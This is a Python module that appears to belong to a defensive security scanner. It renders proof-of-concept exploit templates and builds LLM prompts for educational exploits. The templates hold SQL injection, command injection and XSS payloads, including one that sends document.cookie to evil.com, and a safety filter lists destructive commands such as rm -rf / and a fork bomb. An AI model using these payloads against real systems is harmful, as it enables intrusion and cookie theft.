# exploit_generator.py (17 kB)
"""Exploit generator for creating proof-of-concept security exploits."""
import json
import re
from dataclasses import dataclass
from typing import Any
from jinja2 import Environment, Template
from ..config import SecurityConfig
from ..credentials import CredentialManager
from .types import Category, ThreatMatch
class ExploitGenerationError(Exception):
    """Signals that an exploit could not be generated."""
@dataclass
class ExploitContext:
    """Context information for exploit generation.

    Attributes:
        threat_match: The detected threat the exploit is generated for.
        source_code: The vulnerable source code.
        additional_context: Optional extra key/value data. ``None`` (the
            default) is replaced with a fresh empty dict after init.
    """

    threat_match: ThreatMatch
    source_code: str
    # Annotated as optional because None is the accepted "not provided"
    # value; __post_init__ normalizes it so every instance owns its own dict
    # (a literal {} default would be shared/mutable and is rejected by
    # dataclasses).
    additional_context: dict[str, Any] | None = None

    def __post_init__(self) -> None:
        """Replace a missing ``additional_context`` with an empty dict."""
        if self.additional_context is None:
            self.additional_context = {}
@dataclass
class ExploitPrompt:
    """A system/user prompt pair together with the threat and source it targets."""

    system_prompt: str
    user_prompt: str
    threat_match: ThreatMatch
    source_code: str

    def to_dict(self) -> dict[str, Any]:
        """Build a flat dictionary for JSON serialization.

        The result carries both prompts plus selected fields of the threat
        match; ``source_code`` is not part of it.

        Returns:
            Dictionary with the prompt texts and threat details
        """
        serialized: dict[str, Any] = {}
        serialized["system_prompt"] = self.system_prompt
        serialized["user_prompt"] = self.user_prompt

        match = self.threat_match
        serialized["threat_type"] = match.rule_name
        serialized["severity"] = match.severity.value
        serialized["category"] = match.category.value
        serialized["file_path"] = match.file_path
        serialized["line_number"] = match.line_number
        return serialized
class SafetyFilter:
    """Filter to ensure exploits are safe for educational purposes."""

    # (pattern, replacement) pairs applied by sanitize_exploit(). They are
    # compiled once and case-insensitively so that sanitizing neutralizes the
    # same spellings (e.g. "RM -RF /") that is_safe() rejects.
    _REPLACEMENTS = (
        (
            re.compile(r"rm\s+-rf\s+/", re.IGNORECASE),
            'echo "This would delete files"',
        ),
        (
            re.compile(r"format\s+c:", re.IGNORECASE),
            'echo "This would format drive"',
        ),
        (
            re.compile(r"del\s+/s\s+/q", re.IGNORECASE),
            'echo "This would delete files"',
        ),
    )

    # Marker that identifies an exploit which already carries the warning.
    _WARNING_MARKER = "# WARNING:"
    _WARNING_HEADER = "# WARNING: This is for educational purposes only!\n"

    def __init__(self):
        """Set up the regular expressions that identify dangerous content."""
        self.dangerous_patterns = [
            r"rm\s+-rf\s+/",
            r"format\s+c:",
            r"del\s+/s\s+/q",
            r":\(\)\{\s*:\s*\|\s*:\s*&\s*\}\s*;",  # Fork bomb
            r"while\s*\(\s*1\s*\)",  # Infinite loop
            r'exec\s*\(\s*["\']rm\s+-rf',
            r'subprocess\.call\s*\(\s*["\']rm\s+-rf',
            r'os\.system\s*\(\s*["\']rm\s+-rf',
            r'eval\s*\(\s*["\'].*rm\s+-rf',
            r'shell_exec\s*\(\s*["\']rm\s+-rf',
            r'system\s*\(\s*["\']rm\s+-rf',
        ]
        self.compiled_patterns = [
            re.compile(pattern, re.IGNORECASE) for pattern in self.dangerous_patterns
        ]

    def is_safe(self, exploit: str) -> bool:
        """Check if an exploit is safe for educational purposes.

        Args:
            exploit: The exploit string to check

        Returns:
            True if no dangerous pattern matches anywhere in the exploit,
            False otherwise
        """
        return not any(pattern.search(exploit) for pattern in self.compiled_patterns)

    def sanitize_exploit(self, exploit: str) -> str:
        """Sanitize an exploit to make it safe for educational purposes.

        Destructive commands are replaced with harmless ``echo`` statements
        (matched case-insensitively, consistent with ``is_safe``) and a
        warning header is prepended unless the text already starts with one.

        Args:
            exploit: The exploit string to sanitize

        Returns:
            Sanitized exploit string
        """
        safe_exploit = exploit
        for pattern, replacement in self._REPLACEMENTS:
            safe_exploit = pattern.sub(replacement, safe_exploit)

        # Add the safety warning only once.
        if not safe_exploit.startswith(self._WARNING_MARKER):
            safe_exploit = self._WARNING_HEADER + safe_exploit
        return safe_exploit
class TemplateEngine:
    """Engine for generating exploits from templates."""

    def __init__(self):
        """Create the Jinja2 environment and load the built-in templates."""
        # This is intentional for educational exploit generation in a defensive security tool
        # deepcode ignore XSS: False positive - this is a defensive security tool that generates
        # educational exploits with proper safety warnings and context
        # nosemgrep: python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2
        self.env = (
            Environment()
        )  # nosec B701 - autoescape disabled intentionally for exploit generation
        self.templates = self._load_built_in_templates()

    def _load_built_in_templates(self) -> dict[str, Template]:
        """Load built-in exploit templates.

        Templates are rendered with two variables: ``threat`` and
        ``source_code``. The "Example usage" lines therefore spell out the
        basic payload literally; an undefined ``{{ payload }}`` variable
        would render as an empty string with the default Jinja2 settings.

        Returns:
            Dictionary of template name to Template object
        """
        templates = {}

        # SQL Injection template
        templates["sql_injection"] = self.env.from_string(
            """
# SQL Injection Exploit
# Target: {{ threat.rule_name }}
# Severity: {{ threat.severity.value }}
# Basic SQL injection payload
payload = "' OR '1'='1"
# Union-based injection
union_payload = "' UNION SELECT username, password FROM users--"
# Time-based blind injection
time_payload = "'; WAITFOR DELAY '00:00:05'--"
# Boolean-based blind injection
boolean_payload = "' AND (SELECT COUNT(*) FROM users) > 0--"
# Example usage:
# In the vulnerable code: {{ threat.code_snippet }}
# Replace user input with: ' OR '1'='1
"""
        )

        # XSS template
        templates["xss"] = self.env.from_string(
            """
# Cross-Site Scripting (XSS) Exploit
# Target: {{ threat.rule_name }}
# Severity: {{ threat.severity.value }}
# Basic XSS payload
payload = "<script>alert('XSS')</script>"
# Cookie stealing payload
cookie_payload = "<script>document.location='http://evil.com/steal.php?cookie='+document.cookie</script>"
# DOM manipulation payload
dom_payload = "<img src='x' onerror='alert(document.domain)'>"
# Example usage:
# In the vulnerable code: {{ threat.code_snippet }}
# Input: <script>alert('XSS')</script>
"""
        )

        # Command injection template
        templates["command_injection"] = self.env.from_string(
            """
# Command Injection Exploit
# Target: {{ threat.rule_name }}
# Severity: {{ threat.severity.value }}
# Basic command injection
payload = "; ls -la"
# Command chaining
chain_payload = " && whoami"
# Safe demonstration payload
safe_payload = "; echo 'Command injection successful'"
# Example usage:
# In the vulnerable code: {{ threat.code_snippet }}
# Input: ; ls -la
"""
        )
        return templates

    def generate_exploit(
        self, threat_match: ThreatMatch, source_code: str
    ) -> list[str]:
        """Generate exploit from template.

        Args:
            threat_match: The threat match to generate exploit for
            source_code: The vulnerable source code

        Returns:
            List with the single rendered exploit, or an empty list when no
            template is mapped to (or registered for) the threat's category
        """
        template_name = self._get_template_name(threat_match.category)
        if not template_name or template_name not in self.templates:
            return []

        template = self.templates[template_name]
        return [template.render(threat=threat_match, source_code=source_code)]

    def _get_template_name(self, category: Category) -> str | None:
        """Get template name for a threat category.

        Args:
            category: The threat category

        Returns:
            Template name or None if not found
        """
        category_map = {
            Category.INJECTION: "sql_injection",
            Category.XSS: "xss",
            Category.RCE: "command_injection",
        }
        return category_map.get(category)

    def add_template(self, name: str, template_content: str) -> None:
        """Add a custom template, replacing any existing one with that name.

        Args:
            name: Template name
            template_content: Template content (Jinja2 source)
        """
        self.templates[name] = self.env.from_string(template_content)
class LLMExploitGenerator:
    """LLM-based exploit generator that creates prompts for client LLMs."""

    def __init__(self, config: SecurityConfig):
        """Initialize the LLM exploit generator.

        Args:
            config: Security configuration
        """
        self.config = config

    def create_exploit_prompt(self, context: ExploitContext) -> ExploitPrompt:
        """Create exploit generation prompt.

        Args:
            context: Context for exploit generation

        Returns:
            ExploitPrompt object
        """
        return ExploitPrompt(
            system_prompt=self._create_system_prompt(),
            user_prompt=self._create_user_prompt(context),
            threat_match=context.threat_match,
            source_code=context.source_code,
        )

    def parse_exploit_response(self, response_text: str) -> list[str]:
        """Parse exploit response from LLM.

        Args:
            response_text: Raw response from LLM

        Returns:
            List of exploit strings
        """
        return self._parse_exploits(response_text)

    def _create_system_prompt(self) -> str:
        """Create system prompt for exploit generation.

        Returns:
            System prompt string
        """
        return """You are a cybersecurity expert generating educational proof-of-concept exploits.
Your task is to create safe, educational demonstrations of security vulnerabilities.
Guidelines:
1. Always include warnings about responsible disclosure and legal use only
2. Make exploits safe for demonstration purposes (no actual harm)
3. Focus on educational value and understanding the vulnerability
4. Provide clear explanations of how the exploit works
5. Include remediation advice
6. Use placeholder/example data rather than real sensitive information
7. Avoid destructive commands or operations
8. Add appropriate safety warnings and disclaimers
The exploits should be:
- Safe for educational environments
- Well-documented with comments
- Focused on demonstrating the vulnerability concept
- Include both the exploit and the fix/mitigation"""

    def _create_user_prompt(self, context: ExploitContext) -> str:
        """Create user prompt for exploit generation.

        Args:
            context: Exploit context

        Returns:
            Formatted prompt string
        """
        threat = context.threat_match
        # additional_context is an open-ended dict[str, Any]; default=str
        # keeps prompt creation from raising TypeError when it holds a value
        # json cannot encode natively (it is embedded as its str() form).
        extra_context = json.dumps(context.additional_context, indent=2, default=str)
        prompt = f"""
Generate a proof-of-concept exploit for the following security vulnerability:
**Vulnerability Details:**
- Type: {threat.rule_name}
- Description: {threat.description}
- Category: {threat.category.value}
- Severity: {threat.severity.value}
- File: {threat.file_path}
- Line: {threat.line_number}
**Vulnerable Code:**
```
{context.source_code}
```
**Code Context:**
{threat.code_snippet}
**Requirements:**
1. Generate a safe, educational proof-of-concept exploit
2. Include clear explanations of how the exploit works
3. Provide remediation advice
4. Add appropriate warnings about responsible use
5. Make the exploit safe for demonstration (no actual harm)
**Additional Context:**
{extra_context}
Please provide multiple exploit variations if applicable, clearly separated and labeled.
""".strip()
        return prompt

    def _parse_exploits(self, text: str) -> list[str]:
        """Parse multiple exploits from LLM response.

        Every fenced code block (including its ``` fences) becomes one
        exploit; when the response has no fenced block the whole text is
        returned as a single exploit.

        Args:
            text: LLM response text

        Returns:
            List of individual exploit strings
        """
        code_blocks = re.findall(r"```[\s\S]*?```", text)
        return code_blocks if code_blocks else [text]
class ExploitGenerator:
    """Main exploit generator combining templates and LLM generation."""

    def __init__(self, credential_manager: CredentialManager):
        """Initialize the exploit generator.

        Args:
            credential_manager: Credential manager for configuration
        """
        self.credential_manager = credential_manager
        self.config = credential_manager.load_config()
        self.template_engine = TemplateEngine()
        self.safety_filter = SafetyFilter()
        # Initialize LLM generator
        self.llm_generator = LLMExploitGenerator(self.config)

    def generate_exploits(
        self, threat_match: ThreatMatch, source_code: str = "", use_llm: bool = False
    ) -> list[str]:
        """Generate exploits for a threat match.

        Args:
            threat_match: The detected threat
            source_code: The vulnerable source code
            use_llm: Accepted for backward compatibility and not read here;
                LLM generation goes through create_exploit_prompt() and
                parse_exploit_response() instead

        Returns:
            List of exploit strings
        """
        exploits: list[str] = []

        # Start with the examples attached to the threat match, if any
        if threat_match.exploit_examples:
            exploits.extend(threat_match.exploit_examples)

        # Generate from templates
        exploits.extend(self._generate_from_templates(threat_match, source_code))

        return self._apply_safety_filter(exploits)

    def create_exploit_prompt(
        self, threat_match: ThreatMatch, source_code: str = ""
    ) -> ExploitPrompt:
        """Create exploit generation prompt for LLM.

        Args:
            threat_match: The detected threat
            source_code: The vulnerable source code

        Returns:
            ExploitPrompt object
        """
        context = ExploitContext(threat_match, source_code)
        return self.llm_generator.create_exploit_prompt(context)

    def parse_exploit_response(self, response_text: str) -> list[str]:
        """Parse exploit response from LLM.

        Args:
            response_text: Raw response from LLM

        Returns:
            List of exploit strings
        """
        exploits = self.llm_generator.parse_exploit_response(response_text)
        return self._apply_safety_filter(exploits)

    def _apply_safety_filter(self, exploits: list[str]) -> list[str]:
        """Sanitize exploits and drop unsafe ones when safety mode is enabled.

        Args:
            exploits: Exploit strings to process

        Returns:
            The input list unchanged when ``exploit_safety_mode`` is off;
            otherwise the sanitized exploits that still pass ``is_safe``
        """
        if not self.config.exploit_safety_mode:
            return exploits

        sanitized = [
            self.safety_filter.sanitize_exploit(exploit) for exploit in exploits
        ]
        return [exploit for exploit in sanitized if self.safety_filter.is_safe(exploit)]

    def _generate_from_templates(
        self, threat_match: ThreatMatch, source_code: str
    ) -> list[str]:
        """Generate exploits from templates.

        Args:
            threat_match: The threat match
            source_code: The vulnerable source code

        Returns:
            List of exploit strings
        """
        return self.template_engine.generate_exploit(threat_match, source_code)

    def add_custom_template(self, name: str, template_content: str) -> None:
        """Add a custom exploit template.

        Args:
            name: Template name
            template_content: Template content
        """
        self.template_engine.add_template(name, template_content)

    def is_llm_available(self) -> bool:
        """Check if LLM generation is available.

        Returns:
            True if LLM is available (always true now since we use client LLM)
        """
        return True

    def get_exploit_metadata(self, threat_match: ThreatMatch) -> dict[str, Any]:
        """Get metadata about possible exploits for a threat.

        Args:
            threat_match: The detected threat

        Returns:
            Dictionary with exploit metadata
        """
        return {
            "category": threat_match.category.value,
            "severity": threat_match.severity.value,
            "cwe_id": threat_match.cwe_id,
            "owasp_category": threat_match.owasp_category,
            "available_templates": self._get_available_templates(threat_match.category),
            "llm_available": self.is_llm_available(),
            "safety_mode": self.config.exploit_safety_mode,
        }

    def _get_available_templates(self, category: Category) -> list[str]:
        """Get available templates for a category.

        Only names that are actually registered in the template engine
        (built-in or added through add_custom_template) are reported, so the
        metadata never advertises a template that does not exist.

        Args:
            category: Threat category

        Returns:
            List of available template names
        """
        # Candidate template names per category. Names without a built-in
        # template (e.g. "xss_dom", "deserialization", "path_traversal") show
        # up only once a custom template with that name has been added.
        category_templates = {
            Category.INJECTION: ["sql_injection", "command_injection"],
            Category.XSS: ["xss", "xss_dom"],
            Category.RCE: ["command_injection"],
            Category.DESERIALIZATION: ["deserialization"],
            Category.LFI: ["path_traversal"],
        }
        registered = self.template_engine.templates
        return [
            name for name in category_templates.get(category, []) if name in registered
        ]